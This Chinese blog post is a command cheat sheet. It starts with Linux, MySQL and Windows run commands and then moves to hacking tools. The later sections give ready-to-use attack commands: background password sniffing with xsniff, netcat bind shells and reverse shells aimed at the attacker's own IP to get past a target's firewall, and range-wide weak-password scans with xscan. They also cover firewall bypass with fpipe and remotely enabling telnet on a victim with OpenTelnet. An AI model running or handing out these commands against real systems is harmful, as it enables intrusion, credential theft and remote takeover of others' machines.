【Cmd】那些年,我们迷恋的cmd命令(二)

时间:2022-11-23 20:57:44

那些年,我们迷恋的命令(一)

那些年,我们迷恋的命令(二)


Linux系统下基本命令

  1. Linux系统下基本命令: 要区分大小写

  2. uname 显示版本信息(同win2K的 ver)

  3. dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)

  4. pwd 查询当前所在的目录位置

  5. cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。

  6. cat 文件名 查看文件内容

  7. cat >abc.txt 往abc.txt文件中写上内容。

  8. more 文件名 以一页一页的方式显示一个文本文件。

  9. cp 复制文件

  10. mv 移动文件

  11. rm 文件名 删除文件,rm -a 目录名删除目录及子目录

  12. mkdir 目录名 建立目录

  13. rmdir 删除子目录,目录内没有文档。

  14. chmod 设定档案或目录的存取权限

  15. grep 在档案中查找字符串

  16. diff 档案文件比较

  17. find 档案搜寻

  18. date 现在的日期、时间

  19. who 查询目前和你使用同一台机器的人以及Login时间地点

  20. w 查询目前上机者的详细资料

  21. whoami 查看自己的帐号名称

  22. groups 查看某人的Group

  23. passwd 更改密码

  24. history 查看自己下过的命令

  25. ps 显示进程状态

  26. kill 停止某进程

  27. gcc 黑客通常用它来编译C语言写的文件

  28. su 权限转换为指定使用者

  29. telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。

  30. ftp ftp连接上某服务器(同win2K)


MYSQL命令

  1. MYSQL 命令:

  2. mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。

  3. (例:mysql -h110.110.110.110 -Uroot -P123456

  4. 注:u与root可以不用加空格,其它也一样)

  5. exit 退出MYSQL

  6. mysqladmin -u用户名 -p旧密码 password 新密码 修改密码

  7. grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)

  8. show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。

  9. use mysql;

  10. show tables; 显示库中的数据表

  11. describe 表名; 显示数据表的结构

  12. create database 库名; 建库

  13. use 库名;

  14. create table 表名 (字段设定列表); 建表

  15. drop database 库名;

  16. drop table 表名; 删库和删表

  17. delete from 表名; 将表中记录清空

  18. select * from 表名; 显示表中的记录

  19. mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。

  20. win2003系统下新增命令(实用部份):

  21. shutdown /参数 关闭或重启本地或远程主机。

  22. 参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。

  23. 例:shutdown /r /t 0 立即重启本地主机(无延时)

  24. taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

  25. 参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。

  26. tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

  27. 参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。


计算机运行命令全集

  1. 计算机运行命令全集 winver---------检查Windows版本

  2. wmimgmt.msc----打开windows管理体系结构

  3. wupdmgr--------windows更新程序

  4. winver---------检查Windows版本

  5. wmimgmt.msc----打开windows管理体系结构

  6. wupdmgr--------windows更新程序

  7. wwww--------windows脚本宿主设置

  8. write----------写字板winmsd-----系统信息

  9. wiaacmgr-------扫描仪和照相机向导

  10. winchat--------XP自带局域网聊天

  11. mem.exe--------显示内存使用情况

  12. Msconfig.exe---系统配置实用程序

  13. mplayer2-------简易widnows media player

  14. mspaint--------画图板

  15. mstsc----------远程桌面连接

  16. mplayer2-------媒体播放机

  17. magnify--------放大镜实用程序

  18. mmc------------打开控制台

  19. mobsync--------同步命令

  20. dxdiag---------检查DirectX信息

  21. drwtsn32------ 系统医生

  22. devmgmt.msc--- 设备管理器

  23. dfrg.msc-------磁盘碎片整理程序

  24. diskmgmt.msc---磁盘管理实用程序

  25. dcomcnfg-------打开系统组件服务

  26. ddeshare-------打开DDE共享设置

  27. dvdplay--------DVD播放器

  28. net stop messenger-----停止信使服务

  29. net start messenger----开始信使服务

  30. notepad--------打开记事本

  31. nslookup-------网络管理的工具向导

  32. ntbackup-------系统备份和还原

  33. narrator-------屏幕"讲述人"

  34. ntmsmgr.msc----移动存储管理器

  35. ntmsoprq.msc---移动存储管理员操作请求

  36. netstat -an----(TC)命令检查接口

  37. syncapp--------创建一个公文包

  38. sysedit--------系统配置编辑器

  39. sigverif-------文件签名验证程序

  40. sndrec32-------录音机

  41. shrpubw--------创建共享文件夹

  42. secpol.msc-----本地安全策略

  43. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码

  44. services.msc---本地服务设置

  45. Sndvol32-------音量控制程序

  46. sfc.exe--------系统文件检查器

  47. sfc /scannow---windows文件保护

  48. tsshutdn-------60秒倒计时关机命令

  49. tourstart------xp简介(安装完成后出现的漫游xp程序)

  50. taskmgr--------任务管理器

  51. eventvwr-------事件查看器

  52. eudcedit-------造字程序

  53. explorer-------打开资源管理器

  54. packager-------对象包装程序

  55. perfmon.msc----计算机性能监测程序

  56. progman--------程序管理器

  57. regedit.exe----注册表

  58. rsop.msc-------组策略结果集

  59. regedt32-------注册表编辑器

  60. rononce -p ----15秒关机

  61. regsvr32 /u *.dll----停止dll文件运行

  62. regsvr32 /u zipfldr.dll------取消ZIP支持

  63. cmd.exe--------CMD命令提示符

  64. chkdsk.exe-----Chkdsk磁盘检查

  65. certmgr.msc----证书管理实用程序

  66. calc-----------启动计算器

  67. charmap--------启动字符映射表

  68. cliconfg-------SQL SERVER 客户端网络实用程序

  69. Clipbrd--------剪贴板查看器

  70. conf-----------启动netmeeting

  71. compmgmt.msc---计算机管理

  72. cleanmgr-------**整理

  73. ciadv.msc------索引服务程序

  74. osk------------打开屏幕键盘

  75. odbcad32-------ODBC数据源管理器

  76. oobe/msoobe /a----检查XP是否激活

  77. lusrmgr.msc----本机用户和组

  78. logoff---------注销命令

  79. iexpress-------木马捆绑工具,系统自带

  80. Nslookup-------IP地址侦测器

  81. fsmgmt.msc-----共享文件夹管理器

  82. utilman--------辅助工具管理器

  83. gpedit.msc-----组策略


命令行方式嗅探器

  1. 命令行方式嗅探器xsniff

  2. :

  3. 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

  4. 参数说明

  5. -tcp 输出TCP数据报

  6. -udp 输出UDP数据报

  7. -icmp 输出ICMP数据报

  8. -pass 过滤密码信息

  9. -hide 后台运行

  10. -host 解析主机名

  11. -addr IP地址 过滤IP地址

  12. -port 端口 过滤端口

  13. -log 文件名 将输出保存到文件

  14. -asc 以ASCII形式输出

  15. -hex 以16进制形式输出

  16. 用法示例

  17. xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

  18. xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出


瑞士军刀

  1. 瑞士军刀:nc.exe

  2. 参数说明:

  3. -h 查看帮助信息

  4. -d 后台模式

  5. -e prog程序重定向,一但连接就执行[危险]

  6. -i secs延时的间隔

  7. -l 监听模式,用于入站连接

  8. -L 监听模式,连接天闭后仍然继续监听,直到CTR+C

  9. -n IP地址,不能用域名

  10. -o film记录16进制的传输

  11. -p[空格]端口 本地端口号

  12. -r 随机本地及远程端口

  13. -t 使用Telnet交互方式

  14. -u UDP模式

  15. -v 详细输出,用-vv将更详细

  16. -w数字 timeout延时间隔

  17. -z 将输入,输出关掉(用于扫锚时)

  18. 基本用法:

  19. nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

  20. nc -l -p 80 开启本机的TCP 80端口并监听

  21. nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

  22. nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

  23. nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

  24. 高级用法:

  25. nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止

  26. nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt

  27. nc -L -p 80 <c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用

  28. type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用

  29. 本机上用:nc -l -p 本机端口

  30. 在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K

  31. nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

  32. 本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称

  33. 在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机

  34. 备 注:

  35. | 管道命令

  36. < 或 > 重定向命令。“<”,例如:tlntadmn <test.txt 指把test.txt的内容赋值给tlntadmn命令

  37. @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中

  38. >与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。

  39. 如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。


扫描工具

  1. 扫描工具:xscan

  2. 基本格式

  3. xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

  4. xscan -file <主机列表文件名><检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

  5. 检测项目

  6. -active 检测主机是否存活

  7. -os 检测远程操作系统类型(通过NETBIOS和SNMP协议)

  8. -port 检测常用服务的端口状态

  9. -ftp 检测FTP弱口令

  10. -pub 检测FTP服务匿名用户写权限

  11. -pop3 检测POP3-Server弱口令

  12. -smtp 检测SMTP-Server漏洞

  13. -sql 检测SQL-Server弱口令

  14. -smb 检测NT-Server弱口令

  15. -iis 检测IIS编码/解码漏洞

  16. -cgi 检测CGI漏洞

  17. -nasl 加载Nessus攻击脚本

  18. -all 检测以上所有项目

  19. 其它选项

  20. -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取

  21. -l 显示所有网络适配器

  22. -v 显示详细扫描进度

  23. -p 跳过没有响应的主机

  24. -o 跳过没有检测到开放端口的主机

  25.   -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10

  26. -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)

  27. 用法示例

  28. xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机

  29. xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机

  30. xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机


其它

  1. Shutdown.exe

  2. Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)

  3. fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)

  4. fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息

  5. Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。

  6. OpenTelnet.exe (远程开启telnet工具)

  7. opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。

  8. NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。

  9. ResumeTelnet.exe (OpenTelnet附带的另一个工具)

  10. resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。

本文出自 “成鹏致远” 博客,请务必保留此出处http://infohacker.blog.51cto.com/6751239/1171491